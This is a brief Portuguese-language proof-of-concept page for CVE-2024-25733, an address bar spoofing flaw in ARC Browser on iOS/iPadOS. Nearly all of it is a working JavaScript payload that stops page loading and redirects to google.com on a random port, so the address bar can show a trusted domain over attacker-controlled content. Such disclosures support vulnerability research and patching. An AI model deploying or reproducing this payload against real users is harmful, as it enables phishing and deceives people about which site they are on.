
Prova de conceito de exploit para CVE-2024-25733 demonstrando falsificação da barra de endereço no ARC Browser em iOS/iPadOS usando manipulação de navegação baseada em JavaScript.
PoC de Spoofing da Barra de Endereços do ARC Browser - iOS/iPadOS
<script>
function spoof() {
setTimeout(() => {
window.stop();
let randomPort;
do {
randomPort = Math.floor(Math.random() * 1000);
} while (randomPort === 0 || randomPort === 443);
document.location = "https://google.com:" + randomPort + "/";
}, 300);
}
spoof();
</script>